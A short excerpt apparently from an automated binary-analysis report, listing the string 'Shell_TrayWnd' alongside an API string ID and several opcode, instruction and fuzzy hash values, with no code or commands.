                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: 259a409f91d2939940ede1b5c78f0e5ce0e96b2c8f8c4a8d6a0839d422c16412
                                                                        • Instruction ID: 2f89aaba3340b977271191b6b13c87333ec344788d85ab56fc8fddba48c24c7e
                                                                        • Opcode Fuzzy Hash: 259a409f91d2939940ede1b5c78f0e5ce0e96b2c8f8c4a8d6a0839d422c16412
                                                                        • Instruction Fuzzy Hash: 66D0127279A3187BF27467709C0BFC67A289F85B25F100815B74DEA1D0C9E0E980DB54